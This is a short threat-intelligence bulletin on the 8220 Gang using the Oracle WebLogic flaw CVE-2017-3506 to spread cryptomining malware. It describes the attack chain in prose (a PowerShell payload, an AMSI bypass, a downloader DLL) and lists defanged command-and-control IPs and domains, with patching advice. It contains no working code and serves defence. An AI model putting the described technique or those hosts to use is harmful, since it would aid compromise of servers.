Cyber Security Threat Summary:
“The notorious cryptojacking group tracked as 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware. The flaw in question is CVE-2017-3506 (CVSS score: 7.4), which, when successfully exploited, could allow an unauthenticated attacker to execute arbitrary commands remotely. ‘This allows attackers to gain unauthorized access to sensitive data or compromise the entire system,’ Trend Micro researcher Sunil Bharti said in a report published this week. 8220 Gang, first documented by Cisco Talos in late 2018, is so named for its original use of port 8220 for command-and-control (C2) network communications” (The Hacker News, 2023).

Security Officer Comments:
In the latest campaign, researchers noted that Oracle WebLogic Server vulnerability was leveraged to deploy a PowerShell payload, designed to create another obfuscated PowerShell Script in memory. Once executed obfuscated script will disable the Windows Anti-Malware Scan Interface and launch a Windows binary that is responsible for reaching out to a remote server and fetching an obfuscated payload.

“The intermediate DLL file, for its part, is configured to download a cryptocurrency miner from one of the three C2 servers – 179.43.155[.]202, work.letmaker[.]top, and su-94.letmaker[.]top – using TCP ports 9090, 9091, or 9092” (The Hacker News, 2023).

According to Trend Micro, the latest attacks also utilized a Linux tool named lwp-download to save arbitrary files on targeted systems.

“Considering the threat actor's tendency to reuse tools for different campaigns and abuse legitimate tools as part of the arsenal, organizations' security teams might be challenged to find other detection and blocking solutions to fend off attacks that abuse this utility,” stated researchers in a recent blog post.

Suggested Correction(s):
Organizations should ensure that their systems are up to date by applying fixes for vulnerabilities like CVE-2017-3506 they become readily available.

IOCs:
https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html

Link(s):
https://thehackernews.com/2023/05/8220-gang-exploiting-oracle-weblogic.html?m=1